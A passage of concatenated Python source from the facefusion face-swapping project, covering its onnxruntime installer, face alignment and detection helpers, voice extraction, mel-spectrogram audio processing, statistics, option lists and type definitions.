HelpFormatter(prog, max_help_position = 200)) program.add_argument('--onnxruntime', help = wording.get('help.install_dependency').format(dependency = 'onnxruntime'), choices = ONNXRUNTIMES.keys()) program.add_argument('--skip-conda', help = wording.get('help.skip_conda'), action = 'store_true') program.add_argument('-v', '--version', version = metadata.get('name') + ' ' + metadata.get('version'), action = 'version') run(program) def run(program : ArgumentParser) -> None: args = program.parse_args() python_id = 'cp' + str(sys.version_info.major) + str(sys.version_info.minor) if not args.skip_conda and 'CONDA_PREFIX' not in os.environ: sys.stdout.write(wording.get('conda_not_activated') + os.linesep) sys.exit(1) if args.onnxruntime: answers =\ { 'onnxruntime': args.onnxruntime } else: answers = inquirer.prompt( [ inquirer.List('onnxruntime', message = wording.get('help.install_dependency').format(dependency = 'onnxruntime'), choices = list(ONNXRUNTIMES.keys())) ]) if answers: onnxruntime = answers['onnxruntime'] onnxruntime_name, onnxruntime_version = ONNXRUNTIMES[onnxruntime] subprocess.call([ 'pip', 'install', '-r', 'requirements.txt', '--force-reinstall' ]) if onnxruntime == 'rocm-5.4.2' or onnxruntime == 'rocm-5.6': if python_id in [ 'cp39', 'cp310', 'cp311' ]: rocm_version = onnxruntime.replace('-', '') rocm_version = rocm_version.replace('.', '') wheel_name = 'onnxruntime_training-' + onnxruntime_version + '+' + rocm_version + '-' + python_id + '-' + python_id + '-manylinux_2_17_x86_64.manylinux2014_x86_64.whl' wheel_path = os.path.join(tempfile.gettempdir(), wheel_name) wheel_url = 'https://download.onnxruntime.ai/' + wheel_name 
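# --- Illustrative aside (not part of facefusion/installer.py) ----------------
# A standalone sketch of how the ROCm wheel name above is assembled, using the
# same string operations as run(). The version values are copied from the
# ONNXRUNTIMES table for 'rocm-5.6'; nothing here downloads or installs anything.
import sys

example_onnxruntime = 'rocm-5.6'
example_onnxruntime_version = '1.16.3'
example_python_id = 'cp' + str(sys.version_info.major) + str(sys.version_info.minor)
example_rocm_version = example_onnxruntime.replace('-', '').replace('.', '')
example_wheel_name = 'onnxruntime_training-' + example_onnxruntime_version + '+' + example_rocm_version + '-' + example_python_id + '-' + example_python_id + '-manylinux_2_17_x86_64.manylinux2014_x86_64.whl'
print('https://download.onnxruntime.ai/' + example_wheel_name)
# ------------------------------------------------------------------------------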
subprocess.call([ 'curl', '--silent', '--location', '--continue-at', '-', '--output', wheel_path, wheel_url ]) subprocess.call([ 'pip', 'uninstall', wheel_path, '-y', '-q' ]) subprocess.call([ 'pip', 'install', wheel_path, '--force-reinstall' ]) os.remove(wheel_path) else: subprocess.call([ 'pip', 'uninstall', 'onnxruntime', onnxruntime_name, '-y', '-q' ]) if onnxruntime == 'cuda-12.2': subprocess.call([ 'pip', 'install', onnxruntime_name + '==' + onnxruntime_version, '--extra-index-url', 'https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple', '--force-reinstall' ]) else: subprocess.call([ 'pip', 'install', onnxruntime_name + '==' + onnxruntime_version, '--force-reinstall' ]) subprocess.call([ 'pip', 'install', 'numpy==1.26.4', '--force-reinstall' ]) File: facefusion/face_store.py from typing import Optional, List import hashlib import numpy from facefusion.typing import VisionFrame, Face, FaceStore, FaceSet FACE_STORE: FaceStore =\ { 'static_faces': {}, 'reference_faces': {} } def get_static_faces(vision_frame : VisionFrame) -> Optional[List[Face]]: frame_hash = create_frame_hash(vision_frame) if frame_hash in FACE_STORE['static_faces']: return FACE_STORE['static_faces'][frame_hash] return None def set_static_faces(vision_frame : VisionFrame, faces : List[Face]) -> None: frame_hash = create_frame_hash(vision_frame) if frame_hash: FACE_STORE['static_faces'][frame_hash] = faces def clear_static_faces() -> None: FACE_STORE['static_faces'] = {} def create_frame_hash(vision_frame : VisionFrame) -> Optional[str]: return hashlib.sha1(vision_frame.tobytes()).hexdigest() if numpy.any(vision_frame) else None def get_reference_faces() -> Optional[FaceSet]: if FACE_STORE['reference_faces']: return FACE_STORE['reference_faces'] return None def append_reference_face(name : str, face : Face) -> None: if name not in FACE_STORE['reference_faces']: FACE_STORE['reference_faces'][name] = [] FACE_STORE['reference_faces'][name].append(face) def clear_reference_faces() -> None: FACE_STORE['reference_faces'] = {} File: facefusion/face_helper.py from typing import Any, Tuple, List from cv2.typing import Size from functools import lru_cache import cv2 import numpy from facefusion.typing import BoundingBox, FaceLandmark5, FaceLandmark68, VisionFrame, Mask, Matrix, Translation, WarpTemplate, WarpTemplateSet, FaceAnalyserAge, FaceAnalyserGender WARP_TEMPLATES : WarpTemplateSet =\ { 'arcface_112_v1': numpy.array( [ [ 0.35473214, 0.45658929 ], [ 0.64526786, 0.45658929 ], [ 0.50000000, 0.61154464 ], [ 0.37913393, 0.77687500 ], [ 0.62086607, 0.77687500 ] ]), 'arcface_112_v2': numpy.array( [ [ 0.34191607, 0.46157411 ], [ 0.65653393, 0.45983393 ], [ 0.50022500, 0.64050536 ], [ 0.37097589, 0.82469196 ], [ 0.63151696, 0.82325089 ] ]), 'arcface_128_v2': numpy.array( [ [ 0.36167656, 0.40387734 ], [ 0.63696719, 0.40235469 ], [ 0.50019687, 0.56044219 ], [ 0.38710391, 0.72160547 ], [ 0.61507734, 0.72034453 ] ]), 'ffhq_512': numpy.array( [ [ 0.37691676, 0.46864664 ], [ 0.62285697, 0.46912813 ], [ 0.50123859, 0.61331904 ], [ 0.39308822, 0.72541100 ], [ 0.61150205, 0.72490465 ] ]) } def estimate_matrix_by_face_landmark_5(face_landmark_5 : FaceLandmark5, warp_template : WarpTemplate, crop_size : Size) -> Matrix: normed_warp_template = WARP_TEMPLATES.get(warp_template) * crop_size affine_matrix = cv2.estimateAffinePartial2D(face_landmark_5, normed_warp_template, method = cv2.RANSAC, ransacReprojThreshold = 100)[0] return affine_matrix def warp_face_by_face_landmark_5(temp_vision_frame : 
VisionFrame, face_landmark_5 : FaceLandmark5, warp_template : WarpTemplate, crop_size : Size) -> Tuple[VisionFrame, Matrix]: affine_matrix = estimate_matrix_by_face_landmark_5(face_landmark_5, warp_template, crop_size) crop_vision_frame = cv2.warpAffine(temp_vision_frame, affine_matrix, crop_size, borderMode = cv2.BORDER_REPLICATE, flags = cv2.INTER_AREA) return crop_vision_frame, affine_matrix def warp_face_by_bounding_box(temp_vision_frame : VisionFrame, bounding_box : BoundingBox, crop_size : Size) -> Tuple[VisionFrame, Matrix]: source_points = numpy.array([ [ bounding_box[0], bounding_box[1] ], [bounding_box[2], bounding_box[1] ], [ bounding_box[0], bounding_box[3] ] ]).astype(numpy.float32) target_points = numpy.array([ [ 0, 0 ], [ crop_size[0], 0 ], [ 0, crop_size[1] ] ]).astype(numpy.float32) affine_matrix = cv2.getAffineTransform(source_points, target_points) if bounding_box[2] - bounding_box[0] > crop_size[0] or bounding_box[3] - bounding_box[1] > crop_size[1]: interpolation_method = cv2.INTER_AREA else: interpolation_method = cv2.INTER_LINEAR crop_vision_frame = cv2.warpAffine(temp_vision_frame, affine_matrix, crop_size, flags = interpolation_method) return crop_vision_frame, affine_matrix def warp_face_by_translation(temp_vision_frame : VisionFrame, translation : Translation, scale : float, crop_size : Size) -> Tuple[VisionFrame, Matrix]: affine_matrix = numpy.array([ [ scale, 0, translation[0] ], [ 0, scale, translation[1] ] ]) crop_vision_frame = cv2.warpAffine(temp_vision_frame, affine_matrix, crop_size) return crop_vision_frame, affine_matrix def paste_back(temp_vision_frame : VisionFrame, crop_vision_frame : VisionFrame, crop_mask : Mask, affine_matrix : Matrix) -> VisionFrame: inverse_matrix = cv2.invertAffineTransform(affine_matrix) temp_size = temp_vision_frame.shape[:2][::-1] inverse_mask = cv2.warpAffine(crop_mask, inverse_matrix, temp_size).clip(0, 1) inverse_vision_frame = cv2.warpAffine(crop_vision_frame, inverse_matrix, temp_size, borderMode = cv2.BORDER_REPLICATE) paste_vision_frame = temp_vision_frame.copy() paste_vision_frame[:, :, 0] = inverse_mask * inverse_vision_frame[:, :, 0] + (1 - inverse_mask) * temp_vision_frame[:, :, 0] paste_vision_frame[:, :, 1] = inverse_mask * inverse_vision_frame[:, :, 1] + (1 - inverse_mask) * temp_vision_frame[:, :, 1] paste_vision_frame[:, :, 2] = inverse_mask * inverse_vision_frame[:, :, 2] + (1 - inverse_mask) * temp_vision_frame[:, :, 2] return paste_vision_frame @lru_cache(maxsize = None) def create_static_anchors(feature_stride : int, anchor_total : int, stride_height : int, stride_width : int) -> numpy.ndarray[Any, Any]: y, x = numpy.mgrid[:stride_height, :stride_width][::-1] anchors = numpy.stack((y, x), axis = -1) anchors = (anchors * feature_stride).reshape((-1, 2)) anchors = numpy.stack([ anchors ] * anchor_total, axis = 1).reshape((-1, 2)) return anchors def create_bounding_box_from_face_landmark_68(face_landmark_68 : FaceLandmark68) -> BoundingBox: min_x, min_y = numpy.min(face_landmark_68, axis = 0) max_x, max_y = numpy.max(face_landmark_68, axis = 0) bounding_box = numpy.array([ min_x, min_y, max_x, max_y ]).astype(numpy.int16) return bounding_box def distance_to_bounding_box(points : numpy.ndarray[Any, Any], distance : numpy.ndarray[Any, Any]) -> BoundingBox: x1 = points[:, 0] - distance[:, 0] y1 = points[:, 1] - distance[:, 1] x2 = points[:, 0] + distance[:, 2] y2 = points[:, 1] + distance[:, 3] bounding_box = numpy.column_stack([ x1, y1, x2, y2 ]) return bounding_box def distance_to_face_landmark_5(points : 
numpy.ndarray[Any, Any], distance : numpy.ndarray[Any, Any]) -> FaceLandmark5:
    x = points[:, 0::2] + distance[:, 0::2]
    y = points[:, 1::2] + distance[:, 1::2]
    face_landmark_5 = numpy.stack((x, y), axis = -1)
    return face_landmark_5

def convert_face_landmark_68_to_5(face_landmark_68 : FaceLandmark68) -> FaceLandmark5:
    face_landmark_5 = numpy.array(
    [
        numpy.mean(face_landmark_68[36:42], axis = 0),
        numpy.mean(face_landmark_68[42:48], axis = 0),
        face_landmark_68[30],
        face_landmark_68[48],
        face_landmark_68[54]
    ])
    return face_landmark_5

def apply_nms(bounding_box_list : List[BoundingBox], iou_threshold : float) -> List[int]:
    keep_indices = []
    dimension_list = numpy.reshape(bounding_box_list, (-1, 4))
    x1 = dimension_list[:, 0]
    y1 = dimension_list[:, 1]
    x2 = dimension_list[:, 2]
    y2 = dimension_list[:, 3]
    areas = (x2 - x1 + 1) * (y2 - y1 + 1)
    indices = numpy.arange(len(bounding_box_list))
    while indices.size > 0:
        index = indices[0]
        remain_indices = indices[1:]
        keep_indices.append(index)
        xx1 = numpy.maximum(x1[index], x1[remain_indices])
        yy1 = numpy.maximum(y1[index], y1[remain_indices])
        xx2 = numpy.minimum(x2[index], x2[remain_indices])
        yy2 = numpy.minimum(y2[index], y2[remain_indices])
        width = numpy.maximum(0, xx2 - xx1 + 1)
        height = numpy.maximum(0, yy2 - yy1 + 1)
        iou = width * height / (areas[index] + areas[remain_indices] - width * height)
        indices = indices[numpy.where(iou <= iou_threshold)[0] + 1]
    return keep_indices

def categorize_age(age : int) -> FaceAnalyserAge:
    if age < 13:
        return 'child'
    elif age < 19:
        return 'teen'
    elif age < 60:
        return 'adult'
    return 'senior'

def categorize_gender(gender : int) -> FaceAnalyserGender:
    if gender == 0:
        return 'female'
    return 'male'

File: facefusion/process_manager.py

from typing import Generator, List
from facefusion.typing import QueuePayload, ProcessState

PROCESS_STATE : ProcessState = 'pending'

def get_process_state() -> ProcessState:
    return PROCESS_STATE

def set_process_state(process_state : ProcessState) -> None:
    global PROCESS_STATE
    PROCESS_STATE = process_state

def is_checking() -> bool:
    return get_process_state() == 'checking'

def is_processing() -> bool:
    return get_process_state() == 'processing'

def is_stopping() -> bool:
    return get_process_state() == 'stopping'

def is_pending() -> bool:
    return get_process_state() == 'pending'

def check() -> None:
    set_process_state('checking')

def start() -> None:
    set_process_state('processing')

def stop() -> None:
    set_process_state('stopping')

def end() -> None:
    set_process_state('pending')

def manage(queue_payloads : List[QueuePayload]) -> Generator[QueuePayload, None, None]:
    for query_payload in queue_payloads:
        if is_processing():
            yield query_payload

File: facefusion/voice_extractor.py

from typing import Any, Tuple
from time import sleep
import scipy
import numpy
import onnxruntime

import facefusion.globals
from facefusion import process_manager
from facefusion.thread_helper import thread_lock, thread_semaphore
from facefusion.typing import ModelSet, AudioChunk, Audio
from facefusion.execution import apply_execution_provider_options
from facefusion.filesystem import resolve_relative_path, is_file
from facefusion.download import conditional_download

VOICE_EXTRACTOR = None
MODELS : ModelSet =\
{
    'voice_extractor':
    {
        'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/voice_extractor.onnx',
        'path': resolve_relative_path('../.assets/models/voice_extractor.onnx')
    }
}

def get_voice_extractor() -> Any:
    global VOICE_EXTRACTOR

    with thread_lock():
        while process_manager.is_checking():
sleep(0.5) if VOICE_EXTRACTOR is None: model_path = MODELS.get('voice_extractor').get('path') VOICE_EXTRACTOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return VOICE_EXTRACTOR def clear_voice_extractor() -> None: global VOICE_EXTRACTOR VOICE_EXTRACTOR = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = MODELS.get('voice_extractor').get('url') model_path = MODELS.get('voice_extractor').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def batch_extract_voice(audio : Audio, chunk_size : int, step_size : int) -> Audio: temp_audio = numpy.zeros((audio.shape[0], 2)).astype(numpy.float32) temp_chunk = numpy.zeros((audio.shape[0], 2)).astype(numpy.float32) for start in range(0, audio.shape[0], step_size): end = min(start + chunk_size, audio.shape[0]) temp_audio[start:end, ...] += extract_voice(audio[start:end, ...]) temp_chunk[start:end, ...] += 1 audio = temp_audio / temp_chunk return audio def extract_voice(temp_audio_chunk : AudioChunk) -> AudioChunk: voice_extractor = get_voice_extractor() chunk_size = 1024 * (voice_extractor.get_inputs()[0].shape[3] - 1) trim_size = 3840 temp_audio_chunk, pad_size = prepare_audio_chunk(temp_audio_chunk.T, chunk_size, trim_size) temp_audio_chunk = decompose_audio_chunk(temp_audio_chunk, trim_size) with thread_semaphore(): temp_audio_chunk = voice_extractor.run(None, { voice_extractor.get_inputs()[0].name: temp_audio_chunk })[0] temp_audio_chunk = compose_audio_chunk(temp_audio_chunk, trim_size) temp_audio_chunk = normalize_audio_chunk(temp_audio_chunk, chunk_size, trim_size, pad_size) return temp_audio_chunk def prepare_audio_chunk(temp_audio_chunk : AudioChunk, chunk_size : int, trim_size : int) -> Tuple[AudioChunk, int]: step_size = chunk_size - 2 * trim_size pad_size = step_size - temp_audio_chunk.shape[1] % step_size audio_chunk_size = temp_audio_chunk.shape[1] + pad_size temp_audio_chunk = temp_audio_chunk.astype(numpy.float32) / numpy.iinfo(numpy.int16).max temp_audio_chunk = numpy.pad(temp_audio_chunk, ((0, 0), (trim_size, trim_size + pad_size))) temp_audio_chunks = [] for index in range(0, audio_chunk_size, step_size): temp_audio_chunks.append(temp_audio_chunk[:, index:index + chunk_size]) temp_audio_chunk = numpy.concatenate(temp_audio_chunks, axis = 0) temp_audio_chunk = temp_audio_chunk.reshape((-1, chunk_size)) return temp_audio_chunk, pad_size def decompose_audio_chunk(temp_audio_chunk : AudioChunk, trim_size : int) -> AudioChunk: frame_size = 7680 frame_overlap = 6656 voice_extractor_shape = get_voice_extractor().get_inputs()[0].shape window = scipy.signal.windows.hann(frame_size) temp_audio_chunk = scipy.signal.stft(temp_audio_chunk, nperseg = frame_size, noverlap = frame_overlap, window = window)[2] temp_audio_chunk = numpy.stack((numpy.real(temp_audio_chunk), numpy.imag(temp_audio_chunk)), axis = -1).transpose((0, 3, 1, 2)) temp_audio_chunk = temp_audio_chunk.reshape(-1, 2, 2, trim_size + 1, voice_extractor_shape[3]).reshape(-1, voice_extractor_shape[1], trim_size + 1, voice_extractor_shape[3]) temp_audio_chunk = temp_audio_chunk[:, :, :voice_extractor_shape[2]] temp_audio_chunk /= numpy.sqrt(1.0 / window.sum() ** 2) return temp_audio_chunk def compose_audio_chunk(temp_audio_chunk : AudioChunk, trim_size : int) -> 
AudioChunk: frame_size = 7680 frame_overlap = 6656 voice_extractor_shape = get_voice_extractor().get_inputs()[0].shape window = scipy.signal.windows.hann(frame_size) temp_audio_chunk = numpy.pad(temp_audio_chunk, ((0, 0), (0, 0), (0, trim_size + 1 - voice_extractor_shape[2]), (0, 0))) temp_audio_chunk = temp_audio_chunk.reshape(-1, 2, trim_size + 1, voice_extractor_shape[3]).transpose((0, 2, 3, 1)) temp_audio_chunk = temp_audio_chunk[:, :, :, 0] + 1j * temp_audio_chunk[:, :, :, 1] temp_audio_chunk = scipy.signal.istft(temp_audio_chunk, nperseg = frame_size, noverlap = frame_overlap, window = window)[1] temp_audio_chunk *= numpy.sqrt(1.0 / window.sum() ** 2) return temp_audio_chunk def normalize_audio_chunk(temp_audio_chunk : AudioChunk, chunk_size : int, trim_size : int, pad_size : int) -> AudioChunk: temp_audio_chunk = temp_audio_chunk.reshape((-1, 2, chunk_size)) temp_audio_chunk = temp_audio_chunk[:, :, trim_size:-trim_size].transpose(1, 0, 2) temp_audio_chunk = temp_audio_chunk.reshape(2, -1)[:, :-pad_size].T return temp_audio_chunk File: facefusion/audio.py from typing import Optional, Any, List from functools import lru_cache import numpy import scipy from facefusion.filesystem import is_audio from facefusion.ffmpeg import read_audio_buffer from facefusion.typing import Fps, Audio, AudioFrame, Spectrogram, MelFilterBank from facefusion.voice_extractor import batch_extract_voice @lru_cache(maxsize = 128) def read_static_audio(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: return read_audio(audio_path, fps) def read_audio(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: sample_rate = 48000 channel_total = 2 if is_audio(audio_path): audio_buffer = read_audio_buffer(audio_path, sample_rate, channel_total) audio = numpy.frombuffer(audio_buffer, dtype = numpy.int16).reshape(-1, 2) audio = prepare_audio(audio) spectrogram = create_spectrogram(audio) audio_frames = extract_audio_frames(spectrogram, fps) return audio_frames return None @lru_cache(maxsize = 128) def read_static_voice(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: return read_voice(audio_path, fps) def read_voice(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: sample_rate = 48000 channel_total = 2 chunk_size = 1024 * 240 step_size = 1024 * 180 if is_audio(audio_path): audio_buffer = read_audio_buffer(audio_path, sample_rate, channel_total) audio = numpy.frombuffer(audio_buffer, dtype = numpy.int16).reshape(-1, 2) audio = batch_extract_voice(audio, chunk_size, step_size) audio = prepare_voice(audio) spectrogram = create_spectrogram(audio) audio_frames = extract_audio_frames(spectrogram, fps) return audio_frames return None def get_audio_frame(audio_path : str, fps : Fps, frame_number : int = 0) -> Optional[AudioFrame]: if is_audio(audio_path): audio_frames = read_static_audio(audio_path, fps) if frame_number in range(len(audio_frames)): return audio_frames[frame_number] return None def get_voice_frame(audio_path : str, fps : Fps, frame_number : int = 0) -> Optional[AudioFrame]: if is_audio(audio_path): voice_frames = read_static_voice(audio_path, fps) if frame_number in range(len(voice_frames)): return voice_frames[frame_number] return None def create_empty_audio_frame() -> AudioFrame: mel_filter_total = 80 step_size = 16 audio_frame = numpy.zeros((mel_filter_total, step_size)).astype(numpy.int16) return audio_frame def prepare_audio(audio : numpy.ndarray[Any, Any]) -> Audio: if audio.ndim > 1: audio = numpy.mean(audio, axis = 1) audio = audio / numpy.max(numpy.abs(audio), axis = 
0)
    audio = scipy.signal.lfilter([ 1.0, -0.97 ], [ 1.0 ], audio)
    return audio

def prepare_voice(audio : numpy.ndarray[Any, Any]) -> Audio:
    sample_rate = 48000
    resample_rate = 16000
    audio = scipy.signal.resample(audio, int(len(audio) * resample_rate / sample_rate))
    audio = prepare_audio(audio)
    return audio

def convert_hertz_to_mel(hertz : float) -> float:
    return 2595 * numpy.log10(1 + hertz / 700)

def convert_mel_to_hertz(mel : numpy.ndarray[Any, Any]) -> numpy.ndarray[Any, Any]:
    return 700 * (10 ** (mel / 2595) - 1)

def create_mel_filter_bank() -> MelFilterBank:
    mel_filter_total = 80
    mel_bin_total = 800
    sample_rate = 16000
    min_frequency = 55.0
    max_frequency = 7600.0
    mel_filter_bank = numpy.zeros((mel_filter_total, mel_bin_total // 2 + 1))
    mel_frequency_range = numpy.linspace(convert_hertz_to_mel(min_frequency), convert_hertz_to_mel(max_frequency), mel_filter_total + 2)
    indices = numpy.floor((mel_bin_total + 1) * convert_mel_to_hertz(mel_frequency_range) / sample_rate).astype(numpy.int16)
    for index in range(mel_filter_total):
        start = indices[index]
        end = indices[index + 1]
        mel_filter_bank[index, start:end] = scipy.signal.windows.triang(end - start)
    return mel_filter_bank

def create_spectrogram(audio : Audio) -> Spectrogram:
    mel_bin_total = 800
    mel_bin_overlap = 600
    mel_filter_bank = create_mel_filter_bank()
    spectrogram = scipy.signal.stft(audio, nperseg = mel_bin_total, nfft = mel_bin_total, noverlap = mel_bin_overlap)[2]
    spectrogram = numpy.dot(mel_filter_bank, numpy.abs(spectrogram))
    return spectrogram

def extract_audio_frames(spectrogram : Spectrogram, fps : Fps) -> List[AudioFrame]:
    mel_filter_total = 80
    step_size = 16
    audio_frames = []
    indices = numpy.arange(0, spectrogram.shape[1], mel_filter_total / fps).astype(numpy.int16)
    indices = indices[indices >= step_size]
    for index in indices:
        start = max(0, index - step_size)
        audio_frames.append(spectrogram[:, start:index])
    return audio_frames

File: facefusion/statistics.py

from typing import Any, Dict
import numpy

import facefusion.globals
from facefusion.face_store import FACE_STORE
from facefusion.typing import FaceSet
from facefusion import logger

def create_statistics(static_faces : FaceSet) -> Dict[str, Any]:
    face_detector_score_list = []
    face_landmarker_score_list = []
    statistics =\
    {
        'min_face_detector_score': 0,
        'min_face_landmarker_score': 0,
        'max_face_detector_score': 0,
        'max_face_landmarker_score': 0,
        'average_face_detector_score': 0,
        'average_face_landmarker_score': 0,
        'total_face_landmark_5_fallbacks': 0,
        'total_frames_with_faces': 0,
        'total_faces': 0
    }
    for faces in static_faces.values():
        statistics['total_frames_with_faces'] = statistics.get('total_frames_with_faces') + 1
        for face in faces:
            statistics['total_faces'] = statistics.get('total_faces') + 1
            face_detector_score_list.append(face.scores.get('detector'))
            face_landmarker_score_list.append(face.scores.get('landmarker'))
            if numpy.array_equal(face.landmarks.get('5'), face.landmarks.get('5/68')):
                statistics['total_face_landmark_5_fallbacks'] = statistics.get('total_face_landmark_5_fallbacks') + 1
    if face_detector_score_list:
        statistics['min_face_detector_score'] = round(min(face_detector_score_list), 2)
        statistics['max_face_detector_score'] = round(max(face_detector_score_list), 2)
        statistics['average_face_detector_score'] = round(numpy.mean(face_detector_score_list), 2)
    if face_landmarker_score_list:
        statistics['min_face_landmarker_score'] = round(min(face_landmarker_score_list), 2)
        statistics['max_face_landmarker_score'] = round(max(face_landmarker_score_list), 2)
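# --- Illustrative aside (not part of facefusion/audio.py) --------------------
# A standalone sketch of the hertz <-> mel mapping used by
# create_mel_filter_bank() above, shown as a round trip over a few frequencies.
# Only numpy is required; the helper bodies repeat the formulas from audio.py.
import numpy

def example_hertz_to_mel(hertz):
    return 2595 * numpy.log10(1 + hertz / 700)

def example_mel_to_hertz(mel):
    return 700 * (10 ** (mel / 2595) - 1)

example_frequencies = numpy.array([ 55.0, 440.0, 7600.0 ])
print(example_mel_to_hertz(example_hertz_to_mel(example_frequencies)))  # recovers ~[55, 440, 7600]
# ------------------------------------------------------------------------------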
statistics['average_face_landmarker_score'] = round(numpy.mean(face_landmarker_score_list), 2) return statistics def conditional_log_statistics() -> None: if facefusion.globals.log_level == 'debug': statistics = create_statistics(FACE_STORE.get('static_faces')) for name, value in statistics.items(): logger.debug(str(name) + ': ' + str(value), __name__.upper()) File: facefusion/choices.py from typing import List, Dict from facefusion.typing import VideoMemoryStrategy, FaceSelectorMode, FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, FaceDetectorModel, FaceMaskType, FaceMaskRegion, TempFrameFormat, OutputVideoEncoder, OutputVideoPreset from facefusion.common_helper import create_int_range, create_float_range video_memory_strategies : List[VideoMemoryStrategy] = [ 'strict', 'moderate', 'tolerant' ] face_analyser_orders : List[FaceAnalyserOrder] = [ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small', 'best-worst', 'worst-best' ] face_analyser_ages : List[FaceAnalyserAge] = [ 'child', 'teen', 'adult', 'senior' ] face_analyser_genders : List[FaceAnalyserGender] = [ 'female', 'male' ] face_detector_set : Dict[FaceDetectorModel, List[str]] =\ { 'many': [ '640x640' ], 'retinaface': [ '160x160', '320x320', '480x480', '512x512', '640x640' ], 'scrfd': [ '160x160', '320x320', '480x480', '512x512', '640x640' ], 'yoloface': [ '640x640' ], 'yunet': [ '160x160', '320x320', '480x480', '512x512', '640x640', '768x768', '960x960', '1024x1024' ] } face_selector_modes : List[FaceSelectorMode] = [ 'many', 'one', 'reference' ] face_mask_types : List[FaceMaskType] = [ 'box', 'occlusion', 'region' ] face_mask_regions : List[FaceMaskRegion] = [ 'skin', 'left-eyebrow', 'right-eyebrow', 'left-eye', 'right-eye', 'glasses', 'nose', 'mouth', 'upper-lip', 'lower-lip' ] temp_frame_formats : List[TempFrameFormat] = [ 'bmp', 'jpg', 'png' ] output_video_encoders : List[OutputVideoEncoder] = [ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc', 'h264_amf', 'hevc_amf' ] output_video_presets : List[OutputVideoPreset] = [ 'ultrafast', 'superfast', 'veryfast', 'faster', 'fast', 'medium', 'slow', 'slower', 'veryslow' ] image_template_sizes : List[float] = [ 0.25, 0.5, 0.75, 1, 1.5, 2, 2.5, 3, 3.5, 4 ] video_template_sizes : List[int] = [ 240, 360, 480, 540, 720, 1080, 1440, 2160, 4320 ] execution_thread_count_range : List[int] = create_int_range(1, 128, 1) execution_queue_count_range : List[int] = create_int_range(1, 32, 1) system_memory_limit_range : List[int] = create_int_range(0, 128, 1) face_detector_score_range : List[float] = create_float_range(0.0, 1.0, 0.05) face_landmarker_score_range : List[float] = create_float_range(0.0, 1.0, 0.05) face_mask_blur_range : List[float] = create_float_range(0.0, 1.0, 0.05) face_mask_padding_range : List[int] = create_int_range(0, 100, 1) reference_face_distance_range : List[float] = create_float_range(0.0, 1.5, 0.05) output_image_quality_range : List[int] = create_int_range(0, 100, 1) output_video_quality_range : List[int] = create_int_range(0, 100, 1) File: facefusion/normalizer.py from typing import List, Optional import hashlib import os import facefusion.globals from facefusion.filesystem import is_directory from facefusion.typing import Padding, Fps def normalize_output_path(target_path : Optional[str], output_path : Optional[str]) -> Optional[str]: if target_path and output_path: target_name, target_extension = os.path.splitext(os.path.basename(target_path)) if is_directory(output_path): output_hash = 
hashlib.sha1(str(facefusion.globals.__dict__).encode('utf-8')).hexdigest()[:8] output_name = target_name + '-' + output_hash return os.path.join(output_path, output_name + target_extension) output_name, output_extension = os.path.splitext(os.path.basename(output_path)) output_directory_path = os.path.dirname(output_path) if is_directory(output_directory_path) and output_extension: return os.path.join(output_directory_path, output_name + target_extension) return None def normalize_padding(padding : Optional[List[int]]) -> Optional[Padding]: if padding and len(padding) == 1: return tuple([ padding[0] ] * 4) #type:ignore[return-value] if padding and len(padding) == 2: return tuple([ padding[0], padding[1], padding[0], padding[1] ]) #type:ignore[return-value] if padding and len(padding) == 3: return tuple([ padding[0], padding[1], padding[2], padding[1] ]) #type:ignore[return-value] if padding and len(padding) == 4: return tuple(padding) #type:ignore[return-value] return None def normalize_fps(fps : Optional[float]) -> Optional[Fps]: if fps is not None: return max(1.0, min(fps, 60.0)) return None File: facefusion/typing.py from typing import Any, Literal, Callable, List, Tuple, Dict, TypedDict from collections import namedtuple import numpy BoundingBox = numpy.ndarray[Any, Any] FaceLandmark5 = numpy.ndarray[Any, Any] FaceLandmark68 = numpy.ndarray[Any, Any] FaceLandmarkSet = TypedDict('FaceLandmarkSet', { '5' : FaceLandmark5, #type:ignore[valid-type] '5/68' : FaceLandmark5, #type:ignore[valid-type] '68' : FaceLandmark68, #type:ignore[valid-type] '68/5' : FaceLandmark68 #type:ignore[valid-type] }) Score = float FaceScoreSet = TypedDict('FaceScoreSet', { 'detector' : Score, 'landmarker' : Score }) Embedding = numpy.ndarray[Any, Any] Face = namedtuple('Face', [ 'bounding_box', 'landmarks', 'scores', 'embedding', 'normed_embedding', 'gender', 'age' ]) FaceSet = Dict[str, List[Face]] FaceStore = TypedDict('FaceStore', { 'static_faces' : FaceSet, 'reference_faces': FaceSet }) VisionFrame = numpy.ndarray[Any, Any] Mask = numpy.ndarray[Any, Any] Matrix = numpy.ndarray[Any, Any] Translation = numpy.ndarray[Any, Any] AudioBuffer = bytes Audio = numpy.ndarray[Any, Any] AudioChunk = numpy.ndarray[Any, Any] AudioFrame = numpy.ndarray[Any, Any] Spectrogram = numpy.ndarray[Any, Any] MelFilterBank = numpy.ndarray[Any, Any] Fps = float Padding = Tuple[int, int, int, int] Resolution = Tuple[int, int] ProcessState = Literal['checking', 'processing', 'stopping', 'pending'] QueuePayload = TypedDict('QueuePayload', { 'frame_number' : int, 'frame_path' : str }) UpdateProgress = Callable[[int], None] ProcessFrames = Callable[[List[str], List[QueuePayload], UpdateProgress], None] WarpTemplate = Literal['arcface_112_v1', 'arcface_112_v2', 'arcface_128_v2', 'ffhq_512'] WarpTemplateSet = Dict[WarpTemplate, numpy.ndarray[Any, Any]] ProcessMode = Literal['output', 'preview', 'stream'] LogLevel = Literal['error', 'warn', 'info', 'debug'] VideoMemoryStrategy = Literal['strict', 'moderate', 'tolerant'] FaceSelectorMode = Literal['many', 'one', 'reference'] FaceAnalyserOrder = Literal['left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small', 'best-worst', 'worst-best'] FaceAnalyserAge = Literal['child', 